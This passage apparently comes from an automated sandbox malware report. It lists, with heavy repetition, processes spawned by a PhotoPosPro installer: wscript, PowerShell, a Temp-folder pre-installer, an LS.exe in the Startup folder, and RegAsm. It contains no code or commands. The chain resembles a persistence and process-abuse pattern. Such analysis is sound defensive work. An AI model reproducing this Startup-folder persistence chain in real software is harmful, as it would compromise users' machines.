                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
